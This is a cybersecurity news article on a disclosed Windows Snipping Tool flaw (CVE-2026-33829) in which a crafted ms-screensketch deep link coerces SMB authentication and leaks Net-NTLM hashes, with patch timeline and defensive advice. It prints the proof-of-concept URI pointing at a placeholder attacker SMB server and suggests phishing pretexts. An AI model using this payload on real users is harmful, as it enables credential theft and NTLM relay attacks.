Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Grafana Labs Security Breach: Hackers Accessed GitHub Code
May 17, 2026
First Public macOS M5 Kernel Exploit Developed Apple Prepared
May 17, 2026
Pwn2Own Day 2: Microsoft Exchange, Win Windows Cursor
May 16, 2026
Home/CyberSecurity News/PoC Exploit for Windows Snipping Tool N Released NTLM
CyberSecurity News

PoC Exploit for Windows Snipping Tool N Released NTLM

A proof-of-concept (PoC) exploit has been publicly released, targeting a newly disclosed vulnerability in Microsoft’s Snipping Tool. This flaw allows attackers to silently steal users’ Net-NTLM...

Marcus Rodriguez
Marcus Rodriguez
April 21, 2026 3 Min Read
9 0

A proof-of-concept (PoC) exploit has been publicly released, targeting a newly disclosed vulnerability in Microsoft’s Snipping Tool. This flaw allows attackers to silently steal users’ Net-NTLM credential hashes by luring victims to a malicious webpage.

Tracked as CVE-2026-33829, the flaw resides in how Windows Snipping Tool handles deep link URI registrations using the ms-screensketch protocol schema. Affected versions of the application register this deep link, which accepts a filePath parameter.

Due to a lack of proper input validation, an attacker can supply a UNC path pointing to a remote, attacker-controlled SMB server, coercing an authenticated SMB connection and capturing the victim’s Net-NTLM hash in the process.

The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public.

Windows Snipping Tool PoC

Exploitation requires minimal technical sophistication. An attacker simply needs to host a malicious URL — or an HTML page that auto-triggers the deep link and convince the target to visit it. The PoC from Black Arrow Security demonstrates the attack with a single browser-triggered URI:

textms-screensketch:edit?&filePath=\<attacker-smb-server>file.png&isTemporary=false&saved=true&source=Toast

When a victim opens this link, Snipping Tool launches and silently attempts to load the remote resource over SMB. During this connection attempt, Windows automatically transmits the user’s Net-NTLM authentication response to the attacker’s server, exposing credentials that can then be cracked offline or used in NTLM relay attacks against internal network resources.

What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to social engineering campaigns. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document.

An attacker could register a domain like snip.example.com and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes.

The victim sees nothing unusual; the Snipping Tool opens as expected while NTLM authentication occurs transparently in the background.

This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common.

Patch Availability and Timeline

Microsoft addressed the vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline is as follows:

  • March 23, 2026 — Vulnerability reported to Microsoft.
  • April 14, 2026 — Microsoft releases a security patch.
  • April 14, 2026 — Coordinated public advisory and PoC release.

Organizations and individual users running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update.

Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts, which could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a strong defensive measure regardless of patch status.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCVEExploitPatchphishingSecurityVulnerability

Share Article

Marcus Rodriguez

Marcus Rodriguez

Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.

Previous Post

Critical Gardyn Smart Gardens Vulnerabilities Let Attackers

Next Post

SideWinder Uses Fake Chrome PDF Viewer and Zimbra Clone to Steal

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Linux Kernel Flaw: Read SSH Keys & Passwords
May 16, 2026
Google Project Zero Reveals Pixel 10 Zero- Discloses Zero-Click
May 16, 2026
Android 16 VPN Bypass Exposes User IP Lets Malicious
May 16, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Sarah simpson
Sarah simpson
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Detects Critical MongoDB CVE-

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us